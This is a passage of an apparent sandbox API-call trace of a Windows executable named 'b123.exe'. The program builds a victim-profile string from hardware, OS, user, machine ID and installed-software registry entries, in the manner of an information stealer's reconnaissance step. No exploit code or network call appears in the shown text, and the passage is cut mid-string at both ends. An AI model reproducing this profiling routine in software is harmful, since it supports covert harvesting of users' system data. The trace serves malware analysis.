name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 " [0235.126] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 ", lpString2="14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508" [0235.126] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\n" [0235.126] RegCloseKey (hKey=0x384) returned 0x0 [0235.127] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x17, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.127] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 90 [0235.127] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.127] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", lpcbData=0x197fac*=0x3d) returned 0x0 [0235.127] lstrlenA (lpString="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030") returned 60 [0235.127] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\n", lpString2="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030" [0235.127] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="11.0.61030.0", lpcbData=0x197fac*=0xd) returned 0x0 [0235.127] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 " [0235.127] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 ", lpString2="11.0.61030.0" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0" [0235.127] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\n" [0235.127] RegCloseKey (hKey=0x384) returned 0x0 [0235.128] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x18, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.128] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 90 [0235.128] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.128] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", lpcbData=0x197fac*=0x3d) returned 0x0 [0235.128] lstrlenA (lpString="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501") returned 60 [0235.128] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\n", lpString2="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501" [0235.128] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="12.0.30501.0", lpcbData=0x197fac*=0xd) returned 0x0 [0235.129] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United 